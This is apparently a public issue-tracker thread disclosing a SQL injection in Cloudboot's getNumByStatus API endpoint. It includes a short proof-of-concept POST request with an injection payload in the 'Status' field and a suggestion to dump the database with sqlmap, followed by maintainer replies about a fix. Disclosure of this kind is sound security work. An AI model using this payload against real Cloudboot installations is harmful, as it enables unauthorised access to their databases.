Cloudboot has SQL injection

Question

Cloudboot has SQL injection

allen909 opened this issue 5 years ago · comments

A sql injection was discovered in cloudboot
There is a sql injection vulnerability which allows remote attackers to inject sql command of /api/osinstall/v1/device/getNumByStatus

PoC:
POST /api/osinstall/v1/device/getNumByStatus HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

{"Status":"1'order by 2#","UserID":0}

"Status" is the injection point

Use sqlmap to get the database

penggy · Answer 1 · Mon Jul 27 2020 16:13:04 GMT+0800 (China Standard Time)

yes it is. already fixed at enterprise version.

Jericho · Answer 2 · Tue Jul 28 2020 05:36:11 GMT+0800 (China Standard Time)

@kedadiannao220 Could you link to a fixing commit please?